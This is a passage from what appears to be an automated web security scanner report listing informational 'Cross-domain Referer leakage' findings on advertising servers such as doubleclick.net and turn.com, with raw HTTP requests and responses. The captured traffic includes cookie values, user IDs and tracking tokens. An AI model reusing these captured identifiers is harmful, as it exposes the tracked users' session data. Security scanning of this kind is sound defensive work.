User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:41 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 21:56:20 GMT
ETag: "21dc76-3008-6c654900"
Accept-Ranges: bytes
Content-Length: 12296
Vary: User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<center>
...[SNIP]...

20. Cross-domain Referer leakage
There are 719 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


20.1. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5875.270604.B3/B5111946.91

Issue detail

The page was loaded from a URL containing a query string:
  • http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?
The response contains the following links to other domains:
  • http://s0.2mdn.net/2356384/N5_5.99_OrderThisDeal_120x600.jpg
  • http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;37406893&migRandom=3938818&migTrackFmtExt=client;io;ad;crtv

Request

GET /adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1118
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:25:22 GMT
Expires: Tue, 25 Jan 2011 04:25:22 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,009 Template Name = Image Banner - Open in New Window -
...[SNIP]...
edDest=http://express.dominos.com/pages/track.jsp?target=promocode&promocode=BANNQ7WN3&utm_source=Banner&utm_medium=DPZ_Mbanner&utm_content=ban_BANNQ7WN3&utm_campaign=MindshareBanner" target="_blank">
<img width="120" height="600" border="0" src="http://s0.2mdn.net/2356384/N5_5.99_OrderThisDeal_120x600.jpg">
</a>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;37406893&migRandom=3938818&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body>
...[SNIP]...

20.2. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5875.270604.B3/B5111946.91

Issue detail

The page was loaded from a URL containing a query string:
  • http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?
The response contains the following links to other domains:
  • http://s0.2mdn.net/2356384/2-N7_Specialty_120x600.jpg
  • http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;38657313&migRandom=2148129&migTrackFmtExt=client;io;ad;crtv

Request

GET /adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1049
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 01:35:44 GMT
Expires: Tue, 25 Jan 2011 01:35:44 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,009 Template Name = Image Banner - Open in New Window -
...[SNIP]...
&migRandom=2148129&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.dominos.com/&utm_source=Banner&utm_medium=DPZ_Mbanner&utm_content=NoPromo&utm_campaign=MindshareBanner" target="_blank">
<img width="120" height="600" border="0" src="http://s0.2mdn.net/2356384/2-N7_Specialty_120x600.jpg">
</a>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;38657313&migRandom=2148129&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body>
...[SNIP]...

20.3. http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6061.194450.CDN.TURN.COM/B4419610.3

Issue detail

The page was loaded from a URL containing a query string:
  • http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;
The response contains the following link to another domain:
  • http://s1.2mdn.net/viewad/2703804/1-MMM_468x60.jpg

Request

GET /adi/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 25 Jan 2011 04:25:33 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 651

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><a target="_blank" href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=BeRbIvVA-TeWrKYmv6Qbr6sm9DAAAAAA
...[SNIP]...
UB2gUCCAA&amp;num=0&amp;sig=AGiWqtwupzlt1zrEqxl3vbbvsaV8fZ1ObQ&amp;client=&amp;adurl=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/http://www.mymms.com/%3Fsrc%3D113266%26sc_cid%3D113266"><img src="http://s1.2mdn.net/viewad/2703804/1-MMM_468x60.jpg" alt="Advertisement" border="0" width="468" height="60"></a>
...[SNIP]...

20.4. http://ad.doubleclick.net/adj/N3753.autotrader.com/B4276010.21

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3753.autotrader.com/B4276010.21

Issue detail

The page was loaded from a URL containing a query string:
  • http://ad.doubleclick.net/adj/N3753.autotrader.com/B4276010.21;sz=300x100;pc=[TPAS_ID];click=http://adserving.autotrader.com/event.ng/Type=click&FlightID=878956&AdID=2109728&TargetID=245135&Targets=259945,259951,259957,259963,259969,259975,259981,229416,235455,238651,245135&Values=307,310,320,325,1168,1626,1638,1686,1720,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19960,34058,35455,36491,36879,37550,39460,39471,40021,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921990&Redirect=;ord=ynsgkn,bgtNmAgetmut?
The response contains the following link to another domain:
  • http://s0.2mdn.net/viewad/2552526/CPO+Logo_Used+Cars300x100_borderAdded.jpg

Request

GET /adj/N3753.autotrader.com/B4276010.21;sz=300x100;pc=[TPAS_ID];click=http://adserving.autotrader.com/event.ng/Type=click&FlightID=878956&AdID=2109728&TargetID=245135&Targets=259945,259951,259957,259963,259969,259975,259981,229416,235455,238651,245135&Values=307,310,320,325,1168,1626,1638,1686,1720,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19960,34058,35455,36491,36879,37550,39460,39471,40021,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921990&Redirect=;ord=ynsgkn,bgtNmAgetmut? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/inc/ad.html?Log=0&v=3.17.167500
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 25 Jan 2011 02:19:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 846

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9a/c/1b8/%2a/j;233910587;0-0;0;58839569;3823-300/100;40324746/40342533/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://adserving.
...[SNIP]...
42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921990&Redirect=http%3a%2f%2flexus.com/cpo/%3Fcid%3DCPOZ10NBGENJPG%26cs%3Apro%3Dlt1%26cs%3Aa%3Ae%3Dcpoz10nbgenjpg"><img src="http://s0.2mdn.net/viewad/2552526/CPO+Logo_Used+Cars300x100_borderAdded.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

20.5. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:
  • http://ad.turn.com/server/ads.js?pub=6552283&cch=6553230&code=6554540&l=468x60&aid=25146571&ahcid=357440&bimpd=2wb0RWgXjYhVFhSdaZSvZ32VN1zGKOsk4ov2i8xHVnR0TwY8YE6gjVIS5MJFmkq2godKGQP5jeGRZOKTMN2DPtoklsfmT3ZxopeRfWXKmxbXuJDbTzEKBlvoWg22g08fQBLFzCXvYXkZJOm3FCPXkqPZwd49ogzwkuChi2oAN0q98Yd16mbfryO0v6b7W0VzMU1XDNtmd2fbCqHfl-bOLdphJr3EE0fC3CbZPy6kexTcMSjEcs4aHvsTkHfk60sItyKa63DoHWQFdWQuV51UaADBnZBrweC9c1vHrvKzBN7gz6f2eb9QWGoPXH87ysBrNA8vd4OeqOloKD4KO4hyFxcWjkdAxInVO9Grk85rDkUjqxRYx-TxGCSbMk0dlzlePuFYfd-0Dyn4P3apF4K7-ud30Lg4lLScyp28lK8k26xaeM3yn5dLx8Vmv7-WCyUiK43YnC00-N2rGpetgjUveL3wc-cQ7FRKnITKYzO3zYWcEISZYQ3K7SwVtCGhpriduMjxuTHZaiS7AIkfl75dGEmN4G-1ojp5K2MVoj7ClSFcv5-XUU5q4pXx6xAqrIe7hQsk85fZdNTnuj1_PDPsjnlx4A5fciM2ToJCqG_TCyWkfAEjXqI310WD2Pi5C3XIsFXYlHf7CLGcqzbXuxjA34TYJ7tTV8wwlrv7VDSXEBUy-EKCRGe7mtrcA-OGBKqnBsUx_9Fg59k79MGA4dHXJReht3ivBnz3hwow8XaUE6U&acp=AAABLbrqvaJXoHwA4-uMLkYoHs1YQ_fNzbFTEQ
The response contains the following links to other domains:
  • http://ad.doubleclick.net/ad/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie4;abr=!ie5;sz=468x60;ord=3442293584429726933?
  • http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;
  • http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;

Request

GET /server/ads.js?pub=6552283&cch=6553230&code=6554540&l=468x60&aid=25146571&ahcid=357440&bimpd=2wb0RWgXjYhVFhSdaZSvZ32VN1zGKOsk4ov2i8xHVnR0TwY8YE6gjVIS5MJFmkq2godKGQP5jeGRZOKTMN2DPtoklsfmT3ZxopeRfWXKmxbXuJDbTzEKBlvoWg22g08fQBLFzCXvYXkZJOm3FCPXkqPZwd49ogzwkuChi2oAN0q98Yd16mbfryO0v6b7W0VzMU1XDNtmd2fbCqHfl-bOLdphJr3EE0fC3CbZPy6kexTcMSjEcs4aHvsTkHfk60sItyKa63DoHWQFdWQuV51UaADBnZBrweC9c1vHrvKzBN7gz6f2eb9QWGoPXH87ysBrNA8vd4OeqOloKD4KO4hyFxcWjkdAxInVO9Grk85rDkUjqxRYx-TxGCSbMk0dlzlePuFYfd-0Dyn4P3apF4K7-ud30Lg4lLScyp28lK8k26xaeM3yn5dLx8Vmv7-WCyUiK43YnC00-N2rGpetgjUveL3wc-cQ7FRKnITKYzO3zYWcEISZYQ3K7SwVtCGhpriduMjxuTHZaiS7AIkfl75dGEmN4G-1ojp5K2MVoj7ClSFcv5-XUU5q4pXx6xAqrIe7hQsk85fZdNTnuj1_PDPsjnlx4A5fciM2ToJCqG_TCyWkfAEjXqI310WD2Pi5C3XIsFXYlHf7CLGcqzbXuxjA34TYJ7tTV8wwlrv7VDSXEBUy-EKCRGe7mtrcA-OGBKqnBsUx_9Fg59k79MGA4dHXJReht3ivBnz3hwow8XaUE6U&acp=AAABLbrqvaJXoHwA4-uMLkYoHs1YQ_fNzbFTEQ HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7Cundefined%7C10; rds=14987%7C14983%7C14999%7C14989%7Cundefined%7C14983%7C14983%7C14983%7C14983%7C14983%7C14987%7Cundefined%7C14983; rv=1; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Thu, 27 Jan 2011 04:25:35 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=IwBhXoqWG6cd6LK1Wnmfuw7xUeE2jEhl1LXLCYCWyYXfaqaDzVRu9ZiuBStYaftYsehsFTSmKxz8H_dT-Jl0Dn1PHcIwC2PH259DCE-JXiNlms1EyPDDRa9sja6UxkO0jlMiBdP63qEMyU4eHDk40-q8V4ePnDNpIWo0aHj1LgRvDJHsqYXKmn_CAlmwlDYlAXIue8YWt2dP1w1i6rIdu3iR9sNXakr5gajG_D0roJProc_DPPlbFfwQu1oDDSlmi2JCFUPKc93aEZ1NND-p1qQrupC4PpJl2uCWF8C-Ug7j4wRYKLFggqjCsn1_kL8pjIHdY1J8-8w9PDgWrAYzcfOyBFHryCDMlf-R2G5eCIyjNutLAx_ZaCjc4v3fNB7_VoYS3R2qKw_a47HiysS2Ptmba4Y5H-dc1Uw_QN8A08AWon01KMZJGdnyaU3IkYhpl8vSxIcisdU7_DI6syvRuno3ly0Kwty7GyhLwCaCPRFlbw3kCi5E8RA9R5HEL0TwQkKr1LG0nXzayhve6FCg1-K4j840hUH4soYbPmQ_AR75b5W85bNwz4KaV3P2D8M9TEr74XNNsqzNK-NlDoE2koee6NAFwZUQriKHjx4Pi8lyVtGdZhgjkOg4zjyNGYCDxGxSj2wWaOpITs_JSH4b4_PSRyaSmsOx3lW7T78waIcqXV7j_wp0-1vNUkgqZEX-1Z-OBBuFyn0OKy4G6pkFi7MhnWmekN1sUgWlK4cJ6ZwPl8PHmUPzlA3dCSM7To-CEXwS-6XX7wB6l1yuQyAyNQyqr-I1ILvQtxafsmYbSsGstISe8YznDbRH5otKYhQ1c7hoZnPzMNOkhNZZ-ZQhp0VuruacOi0fS2cp5uhOgCNvUBrICJHG0MnjQ0lTi6GGM302hU7_HqmpQOMIOs94uLT2ikIRW2HI5LDPiT9GU4wphmnhaS5Lbu_6A1w21YanVoYS3R2qKw_a47HiysS2PuMRKxsLZPg9TZ1tzqCyX1wWon01KMZJGdnyaU3IkYhpRRau1rpsTjOMSZYu72kBgFYls0L0hUa4kAoEYLAwYiaK2oyoHzJXoHiDmJnRkYVJTEk9R7kVTBwtrIAWFE2Lc-K4j840hUH4soYbPmQ_AR7zXj5Srs3uOya3rz3JO3P2znwP73OerR98IwLdJfM5ymCpFLJLMKLPcYf5SnIJJ1X6RI9r5uj4vnBp160Ud5xaxGxSj2wWaOpITs_JSH4b42dJUeQ2EvuZijWeQdTIJ3AGO1HG2Mx-sU7H8DziP0hpSscoJJn9hy1KmH4iwQNP7d_WsBU0E-UgFoJDSWMJtyDWIg74Kyudd-aKTtXOZIlNQPO5B3pOq1-XkD73HtsCaIoA8VHGZPaw8KVYCA0sJFaKAPFRxmT2sPClWAgNLCRWXOzXCBxLcPE6Ch7Z7LiZf2G_mSPqr9HXTX3upFEF7TiBXSv_NvKrn7LHnAqX43Rx-4z7rCEzxe9AJkUnSpSWL2FWvensquNi6iS6WJOp0rE; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Set-Cookie: fc=_vlP_vna-iwaEgLjXffa4lB9LqX0spbsp94IIPTXQBdRvy6-tKeSzr3CZDTMcZ6x1q-zg9FMZDM2f224XLr3XKafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Set-Cookie: pf=lvGeRa5W-f1SCZ0uXnD5CFrmDV3EiuOqs3FPczWBqpKJwV9kSIzX4BtZ7vBDkFqiOBRlShVAuVmwzPtTfRLP834lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:25:35 GMT
Content-Length: 9422


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
oncept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;" WIDTH=468 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;">\n</SCRIPT>
...[SNIP]...
<A HREF="http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/http://ad.doubleclick.net/jump/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie4;abr=!ie5;sz=468x60;ord=3442293584429726933?">\n<IMG SRC="http://ad.doubleclick.net/ad/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie4;abr=!ie5;sz=468x60;ord=3442293584429726933?" BORDER=0 WIDTH=468 HEIGHT=60 ALT="Click Here"></A>
...[SNIP]...

20.6. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:
  • http://ad.turn.com/server/ads.js?pub=6552283&cch=6553230&code=6554540&l=468x60&aid=25146571&ahcid=357440&bimpd=2wb0RWgXjYhVFhSdaZSvZ32VN1zGKOsk4ov2i8xHVnR0TwY8YE6gjVIS5MJFmkq2godKGQP5jeGRZOKTMN2DPtoklsfmT3ZxopeRfWXKmxbXuJDbTzEKBlvoWg22g08fQBLFzCXvYXkZJOm3FCPXkqPZwd49ogzwkuChi2oAN0q98Yd16mbfryO0v6b7W0VzMU1XDNtmd2fbCqHfl-bOLdphJr3EE0fC3CbZPy6kexTcMSjEcs4aHvsTkHfk60sItyKa63DoHWQFdWQuV51UaADBnZBrweC9c1vHrvKzBN7gz6f2eb9QWGoPXH87ysBrNA8vd4OeqOloKD4KO4hyFxcWjkdAxInVO9Grk85rDkUjqxRYx-TxGCSbMk0dlzlePuFYfd-0Dyn4P3apF4K7-ud30Lg4lLScyp28lK8k26xaeM3yn5dLx8Vmv7-WCyUiK43YnC00-N2rGpetgjUveL3wc-cQ7FRKnITKYzO3zYWcEISZYQ3K7SwVtCGhpriduMjxuTHZaiS7AIkfl75dGEmN4G-1ojp5K2MVoj7ClSFcv5-XUU5q4pXx6xAqrIe7hQsk85fZdNTnuj1_PDPsjnlx4A5fciM2ToJCqG_TCyWkfAEjXqI310WD2Pi5C3XIsFXYlHf7CLGcqzbXuxjA34TYJ7tTV8wwlrv7VDSXEBUy-EKCRGe7mtrcA-OGBKqnBsUx_9Fg59k79MGA4dHXJReht3ivBnz3hwow8XaUE6U&acp=AAABLbrqvaJXoHwA4-uMLkYoHs1YQ_fNzbFTEQ
The response contains the following links to other domains:
  • http://ad.doubleclick.net/ad/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie4;abr=!ie5;sz=468x60;ord=3442293584429726933?
  • http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;
  • http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;

Request

